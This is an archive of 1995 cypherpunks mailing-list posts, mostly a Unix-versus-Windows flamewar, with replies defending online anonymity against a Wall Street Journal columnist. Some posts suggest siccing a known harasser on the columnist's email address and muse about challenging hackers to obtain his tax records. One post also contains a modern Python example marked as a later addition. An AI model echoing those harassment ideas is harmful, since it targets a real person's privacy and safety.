In-Reply-To: <9501272119.AA00461@carbon.informix.com>
Message-ID: <9501272235.AA05861@vail.tivoli.com>
MIME-Version: 1.0
Content-Type: text/plain



jamesd@com.informix.com writes:
 > This is an error -- what I said was true for C++, but 
 > then in Windows we too are forced to primarily use
 > interpretation to debug C++.   C++ symbolic debuggers
 > are not up to acceptable capabilities in either system.

I hate to contribute to this silliness, but I can't let blatant errors
like this pass.  I debug reams of C++ daily on a wide variety of UNIX
platforms.  With real symbols.  With real C++ expression evaluation and
overload resolution.

(I also get to use compilers that actually come close to supporting
the language as defined by the ARM.)

| GOOD TIME FOR MOVIE - GOING ||| Mike McNally <m5@tivoli.com>       |
| TAKE TWA TO CAIRO.          ||| Tivoli Systems, Austin, TX:        |
|     (actual fortune cookie) ||| "Like A Little Bit of Semi-Heaven" |




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 27 Jan 95 13:45:14 PST
To: cypherpunks@toad.com
Subject: Re: Wall Street Journal Article
Message-ID: <v01510101ab4eced6779b@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:39 AM 1/27/95, Dale Harrison (AEGIS wrote:
>There was an interesting article in Thursday's Wall Street
>Journal calling for the end of anonymous communications on the Internet.
>It is on page B1 under the "Personal Technology" column and was written
>by Walter Mossberg (mossberg@wsj.com) who invites comment.

This Mossberg guy, to quote Mrs. Slocumb, really gets up my nose.

With apologies to the last flamewar's participants and MicroSquish
partisans, this bozoid monstrosity has historically demonstrated his
cluelessness and is living proof that no one got fired by buying IBM *and*
Microsoft.

Every few weeks this clown shows up on the Paper of Record for the
Plutocracy of the Planet and positively warps space with his inaccuracies.

He probably learned to code in COBOL. He probably calls a microcomputer a
"terminal".  He probably calls a server a "host". He probably even has grey
hair... ;-).

The brain bleeds. The mouth froths.

Somebody needs to feed this guy's email address to Detweiler with the "tip"
that he's a tentacle of someone around here who's actually clueful ...

Cheers,
Bob Hettinga





-----------------
Robert Hettinga  (rah@shipwright.com) "There is no difference between someone
Shipwright Development Corporation     who eats too little and sees Heaven and
44 Farquhar Street                       someone who drinks too much and sees
Boston, MA 02331 USA                       snakes." -- Bertrand Russell
(617) 323-7923






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Harry S. Hawk" <habs@warwick.com>
Date: Fri, 27 Jan 95 13:49:53 PST
To: mossberg@wsj.com
Subject: anon communication
Message-ID: <199501272148.QAA00597@cmyk.warwick.com>
MIME-Version: 1.0
Content-Type: text/plain


Re: anon communications

Hello...

There are many reasons that anonymous communications are needed,
I will just focus briefly on one that is important to our business.

When we post jobs on the Internet we need to remain anonymous. We
do this when we place ads in the NY Times as well.

This is just one reason why anonymous communication on the Internet
is very important.

Harry Hawk
Manager of Computer Services
Warwick Baker & Fiore
212 941 4438
habs@warwick.com

/hawk



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.org>
Date: Fri, 27 Jan 95 18:09:08 PST
To: storm@ssnet.com
Subject: Re: Starting a remailer
In-Reply-To: <Zc8AlKJXYPcE078yn@ssnet.com>
Message-ID: <199501280155.RAA07704@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Two questions:
> 
> Since I've only limited bucks but have certain needs, can I get a
> package deal on a remailer shell account and the MX service?  What
> I'd like is to have all mail to xxxx@myname.com to be forwarded to
> my shell account no matter what xxxx is.  Preserving the xxxx, though.

	If you are getting MX service forwarded to a local account
that will cost you only $5/month. So everything you want would cost
$15/month plus $40 startup for the domain.

> 
> Given the goal of limiting remailer liability, what about having
> them be anonymous?  Instead of sending you a check, send an unidentified
> money order.  This would even allow ownership to change on a frequent
> basis without the system owner knowing who the current operator is.

	Yes, Community ConneXion accepts unidentified payment for
accounts.

-- 
sameer						Voice:   510-841-2014
Network Administrator				Pager:	 510-321-1014
Community ConneXion: The NEXUS-Berkeley		Dialin:  510-549-1383
http://www.c2.org (or login as "guest")			sameer@c2.org



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 15:20:33 PST
To: cypherpunks@toad.com
Subject: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <9501272119.AA00461@carbon.informix.com>
Message-ID: <9501272320.AA20155@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



DONT READ THIS UNLESS YOU GIVE A DAMN ABOUT JAMES DONALD'S "OPINION"
OF UNIX -- HIT DELETE NOW.

jamesd@com.informix.com says:
> But my statement concerning internationalization and
> resource files was correct.

Nope, sorry.

Posix defines these things called "Locales". They provide automatic
and seamless support for things like changing currency symbols, date
formats, fonts, etc. The X windows system has full support for
internationalization in most of its widget sets, too.

> I have made a little tour of people in my company who work on both
> unix and Windows.

Sorry that you don't work with people who know about these things, but
ignorance is not equivalent to absence.

Frankly, I have yet to see a single statement from you that actually
bore some relationship to reality. The most devastating comment you
seem to be able to come up with about why Unix is bad is that make --
an application that doesn't even come with DOS -- used to have some
places where it required tabs. 

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 15:28:16 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: JAMES DONALD FLAME WAR CONTINUED -- DELETE BEFORE READING
In-Reply-To: <Pine.3.89.9501271325.A23224-0100000@netcom10>
Message-ID: <9501272327.AA20166@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



JAMES DONALD FLAME WAR CONTINUED -- DELETE BEFORE READING

"James A. Donald" says:
> On Fri, 27 Jan 1995, Perry E. Metzger wrote:
> > In Unix, I can use a single command to delete an entire file tree --
> > rm -r. In DOS, I have to delete each directory by hand.
> 
> Use the command deltree /y.

It didn't exist until recently. Neither did utilities for moving
around files or directories.

> Or any of the cool third party
> utilities, or the windows file manager which offers a true
> hierarchical view unlike the hierarchical view offered by
> the sun OS file manager.

Oooh, sorry. You don't get to have it both ways. If you can talk about
third party utilities, then I get to point out that there are dozens
of cool third party file browsers. If I don't get to talk about third
party software, then you don't either.

> > DOS doesn't even have a make utility -- perhaps you should do without
> > using make ever again, as DOS is obviously superior.
> 
> I wonder how I have been compiling my files all these years.

With make from third parties. If you want make on unix to do something
different, you can just get the sources (for free usually) and get it
to do anything you like.

And guess, by the way, where make was invented -- hint: not Microsoft.

.pm




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@netcom.com>
Date: Fri, 27 Jan 95 19:00:05 PST
To: "Perry E. Metzger" <perry@imsi.com>
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <9501272320.AA20155@snark.imsi.com>
Message-ID: <Pine.3.89.9501271848.A29134-0100000@netcom10>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 27 Jan 1995, Perry E. Metzger wrote:
> 
> DONT READ THIS UNLESS YOU GIVE A DAMN ABOUT JAMES DONALD'S "OPINION"
> OF UNIX -- HIT DELETE NOW.
> 
> jamesd@com.informix.com says:
> > But my statement concerning internationalization and
> > resource files was correct.
> 
> Nope, sorry.
> 
> Posix defines these things called "Locales". They provide automatic
> and seamless support for things like changing currency symbols, date
> formats, fonts, etc. The X windows system has full support for
> internationalization in most of its widget sets, too.

I know what a Locale is:

The fact that you confuse this with the internationalization
problem shows that most unix folk have no tools for this problem,
so that the idea of tools that address it is inconceivable
to them.

Typical primitive unix mentality.   I would expect no better
of someone who is unaware that the times have changed since
the days when the PC world did not have make files (because
our programs were so small we did not need them.)

I will explain this to you in simple terms:

To facilitate internationalization, everything that is 
translatable, for example dialogs, buttons, etc, has to
be in one set of files, and everything that should not
be translated needs to be in another set of files.

If you do this by hand you get an immense number of
connections between the two file sets, and the possibility
of many subtle bugs being introduced when one set
of files is translated.

Therefore your tools for painting dialog boxes and menus etc.
must work in such a way as to facilitate separation and 
translation, which is done in windows by having *.rc files
that get translated, and *.c files that do not.

In Unix each company seems to have its own hand rolled tools
to accomplish this task, or no tools at all -- they do it
by hand.

(Somebody sent me a letter saying that Next Step supports
graphical editing of dialog boxes.  While this is an important
part of internationalizability, it is not internationalizability.

For example Visual Basic also supports graphical editing of dialog boxes,
yet it does not support internationalization in the way that
App Studio and Resource Workshop do.)

> Frankly, I have yet to see a single statement from you that actually
> bore some relationship to reality. The most devastating comment you
> seem to be able to come up with about why Unix is bad is that make --
> an application that doesn't even come with DOS -- used to have some
> places where it required tabs. 

You display profound ignorance, Perry.

We in the DOS world have been using make ever since we had enough
memory to make it worth while.

Furthermore the "make" bug that I complained of, shows typical unix
shoddiness.  Unix tools have sharp edges in the wrong places.

It is these unexpected sharp edges, like a chain saw with no
handle, that make unix hard to use.

 ---------------------------------------------------------------------
                                          |  
We have the right to defend ourselves     |   http://www.catalog.com/jamesd/
and our property, because of the kind     |  
of animals that we are. True law          |   James A. Donald
derives from this right, not from the     |  
arbitrary power of the omnipotent state.  |   jamesd@netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Fri, 27 Jan 95 16:13:05 PST
To: mossberg@wsj.com
Subject: anonymous mailing
Message-ID: <m0rY0ml-0002H4C@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


Since you invite comment:

You seem to think that anonymity can be separated from privacy itself.
Anonymity was an accidental feature of the telephone system that was
only recently eliminated.  Now, it seems, that those who seek control
over others have realized that it could be eliminated in other media
as well (why not routinely fingerprint everyone, and dust all postal
mail for fingerprints? More practically, why not earmark every transaction
on the Reuters feed?  Or credit every article in the Economist?).  But
even these fundamental disruptions to basic institutions are dwarfed by
the threat to individual confidence to speak out and not fear retribution,
in a world with so many laws that everyone is breaking one or another...

Consider this:  Given the speed and efficiency with which data
can be gathered over the networks, including levels of traffic between
entities (often the most useful data for purposes of spying on them),
it could be a matter of a short time before a complete dossier of our
motions and associations is in the hands of every lawful authority,
every service provider, and every brother in law of either, and for sale
to the highest bidder - note that most complaints against "hackers" that
dig up private data concern attacks against large data banks (e.g. bank
records).  We might question the buildup of these data banks that make
us so vulnerable to invasions of privacy, rather than those who invade.

I am pondering whether to put a standing offer out in this feared "hacker"
community for your tax records.  If I received no takers for the challenge,
I am confident that it would not be due to lack of ability, but because
they respect your rights more than you respect theirs.  That is, ours.
That is, yours.

There is no need to protect my name in this case, but only because it
seems clear to me that a majority of those who understand this issue,
stand on my side.  If we ever become a minority I may feel less confident,
and then anonymity may make the difference between speaking out alone or
not at all.  Extinguish the "lone anonymous voice" from electronic media,
which is the mainstream in which commerce is done and thoughts develop,
and you might as well have extinguished the pamphleteer from the American
Revolution.  In fact, you *will* have extinguished him.  I hope you have
something to replace him with:  Universal tolerance ?  Spiritual nirvana?
How do you propose to protect the lone citizen with an unpopular view who
is not yet numerous enough to command a seat in Congress?

Craig Hubley                Business that runs on knowledge
Craig Hubley & Associates   needs software that runs on the net
craig@passport.ca   416-778-6136  416-778-1965 FAX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Fri, 27 Jan 95 17:21:25 PST
To: cypherpunks@toad.com
Subject: Re: Clinton freezes U.S. assets of Mideast groups
In-Reply-To: <Pine.3.89.9501241122.A12422-0100000@netcom10>
Message-ID: <rRPAlKJXY5f9078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


In article <Pine.3.89.9501241122.A12422-0100000@netcom10>,
"James A. Donald" <jamesd@netcom.com> wrote:
> 
> At present it seems to me that unix machines on the internet
> are intrinsically insecure -- the methods used to secure them
> are a collection of ad hoc patches.  For example all
> unix machines are vulnerable to the trojan
> horse attack.

Actually, I don't believe that HFS's B3 Unix is vulnerable to this.
And I understand that it is not available in a shrinkwrap version
for the '486.  I do not know if it is a restricted purchase item,
though.  I know it can't be exported without license.

On the other hand, it's also multi-K$. :-(

> (I expect the usual flame from Perry that I am stupefyingly
> ignorant and that that is all fixed or will be shortly 
> -- no Perry it is not all fixed -- it cannot be fixed.  
> The necessary fixes have to be designed in at the
> beginning.)

True.  But they did build it in from the beginning. :-)

--
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: craig@passport.ca (Craig Hubley)
Date: Fri, 27 Jan 95 16:59:38 PST
To: cypherpunks@toad.com
Subject: Shut up already - James Donald does not even exist...
Message-ID: <m0rY1W7-0002H4C@forged.passport.ca>
MIME-Version: 1.0
Content-Type: text/plain


James Donald does not exist.  We can stop the flame war now.  Trying to
be a good net.citizen, I sent "him" e-mail to correct one of "his" line-
noise-quality opinions quietly (so he might shut up) - has no one else
tried this?  It bounced, failing to resolve host which does not usually
happen here if the site is real.  So I submit the following as evidence
that "he" does not exist:

- com.informix.com does not seem real.

- no living human being could hold such opinions and simultaneously operate
  his vital organs (i.e. the level of intelligence implied by his "opinions"
  is even lower than that necessary to support breathing and digestion)

- posting pseudonymously to cypherpunks and engaging them in spurious flame
  argument might seem like fun to someone hostile to the anonymity agenda
  and a way of generating a case that "see, anonymous/pseudonymous use of
  the internet angers even cypherpunks"

James, if you *do* exist, I suggest you shut up now before someone you may
want to work for reads your idiot posts.  As for me, I am enforcing my own
opinion that you do not exist by entering your "address" in my filter file.
Goodbye.

Those of you who care about flame wars can read the following bounced msg:

> Date: Fri, 27 Jan 95 18:50 EST
> From: <MAILER-DAEMON@passport.ca>
> To: craig
> Subject: mail failed, returning to sender
> Reference: <m0rY0Qb-0002HEC@forged.passport.ca>
> Content-Type: text
> Content-Length: 1980
> 
> |------------------------- Failed addresses follow: ---------------------|
>  jamesd@com.informix.com ... unknown host
> |------------------------- Message text follows: ------------------------|
> Received: by forged.passport.ca (Smail3.1.29.1 #5)
> 	id m0rY0Qb-0002HEC; Fri, 27 Jan 95 18:50 EST
> Message-Id: <m0rY0Qb-0002HEC@forged.passport.ca>
> From: craig (Craig Hubley)
> Subject: Re: Oops, Correction: one big error in "Even more unix holy war."
> To: jamesd@com.informix.com
> Date: Fri, 27 Jan 1995 18:50:09 -0500 (EST)
> In-Reply-To: <9501272119.AA00461@carbon.informix.com> from "jamesd@com.informix.com" at Jan 27, 95 01:19:01 pm
> X-Mailer: ELM [version 2.4 PL23]
> MIME-Version: 1.0
> Content-Type: text/plain; charset=US-ASCII
> Content-Transfer-Encoding: 7bit
> Content-Length: 1203      
> 
> > Unix has no equivalent of App Studio, etc.  I have made
> 
> Nonsense.  What about UIM/X, InterViews screen painter,
> and the many cross-platform toolkits (C++Views, Visix
> Galaxy, Neuron Data Client/Server Elements, Zinc, Zapp,
> and now Taligent... for that matter what about NextStep?
> And the increasing number of Smalltalk tools ?)
> 
> > a little tour of people in my company who work on both
> > unix and Windows.  I (fortunately) work primarily on
> > Windows, as you may have guessed.
> 
> I *did* guess, but never mind how.  :-)
>  
> > Most of my correspondents had replies along the lines
> > of "Huh -- internationalization -- what source code
> > tools could possibly help you with internationalization."
> 
> Zinc runs off a special purpose OODB.  Translating a GUI 
> from one language to another is a matter of setting a flag
> at runtime... everything switches from English into Spanish
> or whatever.
>  
> > James A. Donald
> 
> Sorry James, your opinions on this matter are line noise. Posts
> with this subject and your name on them will be ignored.  Please
> consult the various FAQs on Unix programming and crossplatform
> toolkits before wasting bandwidth with this pure nonsense again.
> 
> So much for your free education.
> 
> Craig
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@bwh.harvard.edu>
Date: Fri, 27 Jan 95 17:12:26 PST
To: craig@passport.ca (Craig Hubley)
Subject: Re: anonymous mailing
In-Reply-To: <m0rY0ml-0002H4C@forged.passport.ca>
Message-ID: <199501280110.UAA12579@bwh.harvard.edu>
MIME-Version: 1.0
Content-Type: text/plain



| You seem to think that anonymity can be separated from privacy itself.
| Anonymity was an accidental feature of the telephone system that was
| only recently eliminated.  Now, it seems, that those who seek control
| over others have realized that it could be eliminated in other media
| as well (why not routinely fingerprint everyone, and dust all postal
| mail for fingerprints? More practically, why not earmark every transaction
| on the Reuters feed?  Or credit every article in the Economist?).  But
| even these fundamental disruptions to basic institutions are dwarfed by
| the threat to individual confidence to speak out and not fear retribution,
| in a world with so many laws that everyone is breaking one or another...

	The Economist is written anonymously because it prevents
"Dan Rather syndrome."


Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
						       -Hume



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sdw@lig.net (Stephen D. Williams)
Date: Fri, 27 Jan 95 17:39:14 PST
To: craig@passport.ca (Craig Hubley)
Subject: Re: Shut up already - James Donald does not even exist...
In-Reply-To: <m0rY1W7-0002H4C@forged.passport.ca>
Message-ID: <m0rXxTV-0009v9C@sdwsys>
MIME-Version: 1.0
Content-Type: text/plain


> 
> James Donald does not exist.  We can stop the flame war now.  Trying to
> be a good net.citizen, I sent "him" e-mail to correct one of "his" line-
> noise-quality opinions quietly (so he might shut up) - has no one else
> tried this?  It bounced, failing to resolve host which does not usually
> happen here if the site is real.  So I submit the following as evidence
> that "he" does not exist:

jamesd@netcom.com is in the header sometimes and doesn't bounce.
Why he has a bogus address he didn't explain adequately.  (This was
in a private exchange in addition to the public one.  I deleted
cypherpunks and he didn't notice for a couple messages until I
pointed it out.  If you want the whole collection...)

> - no living human being could hold such opinions and simultaneously operate
>   his vital organs (i.e. the level of intelligence implied by his "opinions"
>   is even lower than that necessary to support breathing and digestion)

HAHAHAHAHA ROFL!

> - posting pseudonymously to cypherpunks and engaging them in spurious flame
>   argument might seem like fun to someone hostile to the anonymity agenda
>   and a way of generating a case that "see, anonymous/pseudonymous use of
>   the internet angers even cypherpunks"

Thought of that... Reasonably good if so.  Too far from 1Apr though.


OK, now how about that Pascal vs. C war...  (Ahhhh... I didn't mean it!)

sdw
-- 
Stephen D. Williams    25Feb1965 VW,OH      sdw@lig.net http://www.lig.net/sdw
Senior Consultant    513-865-9599 FAX/LIG   513.496.5223 OH Page BA Aug94-Feb95
OO R&D AI:NN/ES crypto     By Buggy: 2464 Rosina Dr., Miamisburg, OH 45342-6430
Firewalls/WWW servers ICBM: 39 38 34N 84 17 12W home, 37 58 41N 122 01 48W work
Pres.: Concinnous Consulting,Inc.;SDW Systems;Local Internet Gateway Co.17Jan95



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: erc@s116.slcslip.indirect.com (Ed Carp [khijol Sysadmin])
Date: Fri, 27 Jan 95 20:30:12 PST
To: perry@imsi.com
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <9501280307.AA20529@snark.imsi.com>
Message-ID: <m0rY4lE-0004IKC@s116.slcslip.indirect.com>
MIME-Version: 1.0
Content-Type: text


> "James A. Donald" says:
> > I know what a Locale is:
> 
> You've shown no indication that you do.
> 
> > The fact that you confuse this with the internationalization
> > problem shows that most unix folk have no tools for this problem,
> 
> Vigorous insistence doesn't change the truth, James.
> 
> > In Unix each company seems to have its own hand rolled tools
> > to accomplish this task, or no tools at all -- they do it
> > by hand.
> 
> We don't have symbolic debuggers either, as I recall.

Why don't you guys take this private little war TO EMAIL???  I don't want
to hear it on the list.  Hitting 'g' instead of 'r' only makes you guys
look like idiots instead of spreading your witty little remarks all over
the net.
-- 
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi
                       ** PGP encrypted email preferred! **

Cop: "How many beers have you had tonight, bro?"
Suspect: "Seventy."  -- from the TV show "Cops"



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 27 Jan 95 22:01:17 PST
To: cypherpunks@toad.com
Subject: Even more unix holy wars.
Message-ID: <199501280600.WAA25615@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


jamesd@com.informix.com wrote:
>but in unix you type:
>   find . -name filename -print

This assumes the find command actually works ;) Find doesn't follow
symbolic links, which renders it mostly useless.  It doesn't follow
symbolic links to avoid falling in an infinite cycle.

Of course, any second year computer science student can devise an
algorithm that follows symbolic links and detects when it is in a
cycle, to escape.

The unix philosophy "small is beautiful" <--> "when faced with a choice,
cop out and take the easy route"

This is all well documented in "The Unix Hater's Guide."

How would I go around undeleting a file under Unix?  It's easy on the
Mac.  Doing it under DOS is ugly, but it works.  But with unix, there
is no way.  More productivity has been lost because of accidental
erasure under unix than was lost dealing with the internet worm, than
all security breaches combined.
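
The cycle-detecting traversal the post above alludes to, as an added example that is not part of the original message: a name search that follows symbolic links to directories and enters each directory only once, keyed on its (device, inode) pair. The function names, the file name `target.txt` and the demo tree are constructed for illustration.

```python
import os
import tempfile


def find_following_links(root, name):
    """Search below root for entries called `name`, following symlinks.

    Returns (matches, skipped). `skipped` lists paths that resolved to a
    directory already entered, which is how both true cycles and second
    routes to the same directory show up.
    """
    matches, skipped = [], []
    seen = set()          # (st_dev, st_ino) of every directory entered so far
    stack = [root]        # explicit stack, so deep trees cannot exhaust recursion
    while stack:
        path = stack.pop()
        try:
            st = os.stat(path)            # stat() resolves symlinks
        except OSError:
            continue                      # dangling link or unreadable entry
        key = (st.st_dev, st.st_ino)
        if key in seen:
            skipped.append(path)          # same directory reached again: stop here
            continue
        seen.add(key)
        try:
            entries = sorted(os.scandir(path), key=lambda e: e.name)
        except OSError:
            continue
        subdirs = []
        for entry in entries:
            if entry.name == name:
                matches.append(entry.path)
            try:
                if entry.is_dir(follow_symlinks=True):
                    subdirs.append(entry.path)
            except OSError:
                pass
        stack.extend(reversed(subdirs))   # pop in sorted order
    return matches, skipped


def build_demo_tree(base):
    """Create a constructed sample tree containing a loop, an alias and a dangling link."""
    os.makedirs(os.path.join(base, "a", "b"))
    with open(os.path.join(base, "a", "target.txt"), "w") as fh:
        fh.write("constructed sample file\n")
    os.symlink("..", os.path.join(base, "a", "b", "up"))    # a/b/up -> a (cycle)
    os.symlink("a", os.path.join(base, "shared"))           # second route to a
    os.symlink("missing", os.path.join(base, "dangling"))   # points nowhere
    return base


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        found, revisits = find_following_links(build_demo_tree(tmp), "target.txt")
        print("matches:", found)
        print("skipped:", revisits)
```

A traversal that follows links can leave the starting tree entirely, so when the tree is writable by other users the resolved path of each match should be checked against the intended root before acting on it.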




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@imsi.com>
Date: Fri, 27 Jan 95 19:08:40 PST
To: "James A. Donald" <jamesd@netcom.com>
Subject: Re: DONT READ -- Continuing James Donald flamewar
In-Reply-To: <Pine.3.89.9501271848.A29134-0100000@netcom10>
Message-ID: <9501280307.AA20529@snark.imsi.com>
MIME-Version: 1.0
Content-Type: text/plain



"James A. Donald" says:
> I know what a Locale is:

You've shown no indication that you do.

> The fact that you confuse this with the internationalization
> problem shows that most unix folk have no tools for this problem,

Vigorous insistence doesn't change the truth, James.

> In Unix each company seems to have its own hand rolled tools
> to accomplish this task, or no tools at all -- they do it
> by hand.

We don't have symbolic debuggers either, as I recall.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anonymous-remailer@shell.portal.com
Date: Fri, 27 Jan 95 22:26:30 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy wars.
Message-ID: <199501280625.WAA28228@jobe.shell.portal.com>
MIME-Version: 1.0
Content-Type: text/plain


Perry E. Metzger wrote:
>Did I mention that DOS used to make you use EDLIN out of the box?

Did I mention that UNIX used to make you use ED out of the box?

> that Unix is somehow harder to use than DOS.

Of course it isn't.  Train somebody under BSD (say using csh/tcsh/zsh)
and they are totally prepared to get to work under ksh/bash/sh under
SVR4.  The commands are the same and so are the options, on say things
like ps.  NOT.

Unix commands are powerful and easy to use.  For example, to kill a
process I have to use "ps -aux" or "ps -ef" depending on which flavor
of unix I'm running, note the process id, and do a "kill -9 id".  Why
can't I kill a job by name (i.e. I can do a "fg %emacs" but not a
"kill %emacs".)  

Unix is filled with design abortions like this.

> that X is harder to use than Windows 

How about better Windows software is available?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: storm@marlin.ssnet.com (Don Melvin)
Date: Fri, 27 Jan 95 20:34:40 PST
To: cypherpunks@toad.com
Subject: Philadelphia CyberCrime
Message-ID: <bESAlKJXYXWJ078yn@ssnet.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Heard on the news today that they arrested a plumber and are holding
him in lieu of $50,000 bail.

He used a PC to crack into the phone system and set up 'Ultra' call
forwarding which forwarded calls to other plumbers businesses to his.
He then took the calls and told the callers that his company was
covering for the one they actually called.

Personal opinion: while I think the guy did steal business from the
other firms, they authorities are trying to find the customers he
'defrauded'.  If they were happy with the work, I don't think they
were actually defrauded.  The other companies did lose income and
I think he should be prosecuted for that, but $50,000 bail seems a
little excessive given the crime.
End Personal opinion.

- --
America - a country so rich and so strong we can reward the lazy 
          and punish the productive and still survive (so far)

Don Melvin                  storm@ssnet.com                finger for PGP key.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBLynFCGvyi8p8VUiJAQFbfwQAq1OimjQvAyOdspvRSIBOApdEryeEXlSf
9YJ0wZAvuSHWxjkJpgapQKwAQxb4kkpJi6BvXqrnMjCWpkc9t5eMwr6Cc7XZUJea
wmYaS19KcSfmgp0x4vJW0QwISR2GDgwyKH0oSz1+uWMTdHka5B70KVsQomnVgUww
8VK0bIrq/Fo=
=I4iQ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ethridge@netcom.com (Allen B. Ethridge)
Date: Fri, 27 Jan 95 21:17:06 PST
To: cypherpunks@toad.com
Subject: Re: Even more unix holy war. Was "Clinton freezes U.S. assets .."
Message-ID: <ab4f82f600021004c795@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


>I am writing this under sun's unix imitation of Microsoft's
>and Apple's GUI.  I am using their almost acceptable ASCII editor.
>
>I leave a window open for a long time.
>
>Then I attempt to close down the window, an operation that I can
>do in Microsoft Windows with a single double click.  In unix
>I click on the border to pop up a menu, carefully drag
>to the right point on the menu, then release.  In addition
>the menu names are confusing.  If you want to minimize a
>window you have to "close" it.  If you want to cause a window
>to cease to be, you have to "quit" it -- Hey did I not already
>quit it when I forgot about it and went to do something else.
>
>
>A warning message comes up:  I have not saved.  I am offered the
>options of quitting or not quitting.
>
>Gee guys, did it never occur to the great unix gurus that at
>this point the option that the user most likely wants to do
>is save the file.  How come the number one most common option
>is not in the message box.


I think you've confused whatever poorly designed GUI you've chosen
to use with UNIX.  The GUI on my workstation at work doesn't behave
like this.  It's not as intuitive as my Mac, but it does bear a
rather frightening resemblance to the Windows system that my brother
has on his Compaq.

Unix isn't a GUI, or even a UI.  It's an operating system.  And it
performs that function better than most.

        allen


allen@well.sf.ca.us          It's dangerous, child, to come to conclusions
ethridge@netcom.com          when you don't have any facts.
my opinions are my own       Dr. Hemlock, The Eiger Sanction






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dfloyd@io.com
Date: Fri, 27 Jan 95 21:27:33 PST
To: cypherpunks@toad.com
Subject: OSS status
Message-ID: <199501280527.XAA08156@pentagon.io.com>
MIME-Version: 1.0
Content-Type: text/plain


Just when I almost get a prototype for the offsite secure storage 
(OSS) program working, I have to hit the self-destruct lever...

The site I was having my test for the OSS suddenly became hostile.  To keep
things from getting worse, I deleted all stuff from there.  It will be a
week or two getting the bug fixes in (I backed it up a week ago...), and
some time until I find a site that I consider 'non-hostile' to work on.

Currently the commands follow the pattern of Remailer-net with the
two colons meaning a pasted header, and two or three commands (Store,
Retrieve, Delete) for the files.

Work is slow due to the fabled Job Hunt (tm).  I appreciate your patience.

Douglas R. Floyd
PGP key fingerable from keyservers.  Note new key as of 1/1/95.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cactus@seabsd.hks.net (Todd Masco)
Date: Fri, 27 Jan 95 21:17:40 PST
To: cypherpunks@toad.com
Subject: Re: anonymous mailing
Message-ID: <199501280513.AAA14436@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- -----BEGIN PGP SIGNED MESSAGE-----

In article <199501280110.UAA12579@bwh.harvard.edu>,
Adam Shostack <adam@bwh.harvard.edu> wrote:
>	The Economist is written anonymously because it prevents
>"Dan Rather syndrome."

You mean getting beat up by randoms screaming "What's the frequency,
Kenneth?"
- - --
Todd Masco     | "life without caution/ the only worth living / love for a man/
cactus@hks.net |  love for a woman/ love for the facts/ protectless" - A Rich
Cactus' Homepage

- -----BEGIN PGP SIGNATURE-----
Version: 2.6.2

- -----END PGP SIGNATURE-----
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBLynSWyoZzwIn1bdtAQGCSQGAoc8P9J6Ffg9FQwiJgZDT8IlGkRot2UNv
IOdE6m8xWJTn8U68u6TBUcc0Z/ldLjpg
=FG1N
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joe Turner <turner@telecheck.com>
Date: Sat, 28 Jan 95 00:15:44 PST
To: cypherpunks@toad.com
Subject: alt.religion.your.operating.system.sucks
Message-ID: <9501280817.AA15280@TeleCheck.com>
MIME-Version: 1.0
Content-Type: text


